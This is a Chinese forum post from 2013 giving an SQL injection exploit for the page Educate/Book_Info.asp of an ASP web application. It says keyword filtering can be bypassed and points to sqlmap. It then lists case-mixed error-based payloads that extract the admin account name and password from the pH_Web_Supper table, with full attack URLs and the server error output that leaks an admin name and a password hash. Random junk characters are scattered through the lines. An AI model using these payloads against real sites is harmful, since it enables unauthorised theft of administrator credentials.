漏洞出现在Educate/Book_Info.asp
) |% [7 J. M. h. D- r' [5 W$ C9 @ y / s! q( [$ t2 X4 M+ ]
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 z C$ H. x8 j& b2 | 8 |) a) q: k' s9 E
exp:如下, r5 Q" y# u6 F' A {
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)! e3 b$ _+ B) g- R7 G
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)' {+ S! [9 S. O' O
) P# f+ C! s! n% y9 Ohttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) x$ [4 G* N, Z
8 S) U$ c+ [' k1 RMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'- {# W1 L( l+ L1 g% P% f) Z3 |: a3 o
; M2 X4 `! l$ ]4 s2 Q! f
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。6 e0 {8 m- z: W! D
) I. N L9 l9 Z' n0 h
/Educate/Book_Info.asp,行 8' `$ i1 d2 g) r8 s# o# Y' h
5 ]; J5 x) {4 _/ t% T A% }
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& M; ?( a, U# X: a* l
( Z3 z+ R# e, L7 G8 L6 ^9 x& k! uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' P# A" E0 p3 h/ u8 Z* _( L8 U3 z
9 t# b. h0 |. s2 v/ a* R7 e
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
; c! J) ^( g7 C& p- Y! N 6 Z0 a+ A/ n5 S1 h: i) q
/Educate/Book_Info.asp,行 8
, j- D2 L% ^" J( @! x& q. m |
发表于 2013-2-16 21:44:16
收藏
支持
反对